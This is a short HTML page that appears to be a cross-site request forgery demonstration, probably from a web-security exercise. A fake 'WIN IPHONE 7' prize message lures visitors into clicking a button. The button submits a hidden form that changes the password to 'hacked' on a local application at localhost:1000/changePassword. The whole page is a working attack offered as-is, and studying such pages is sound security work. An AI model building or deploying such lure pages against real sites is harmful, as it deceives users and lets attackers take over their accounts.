<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="attack.css">
    <title>Document</title>
</head>

<body>
    <h1>WIN IPHONE 7</h1>
    <form action="http://localhost:1000/changePassword" method="POST">
        <label> Hi lucky user !!! you are 100
            <sup>th</sup> visitor to our site. </label>
        <input type="hidden" name="password" value="hacked">
        <br><br><br>
        <button type="submit">Click to get an iPhone</button>
    </form>

</body>

</html>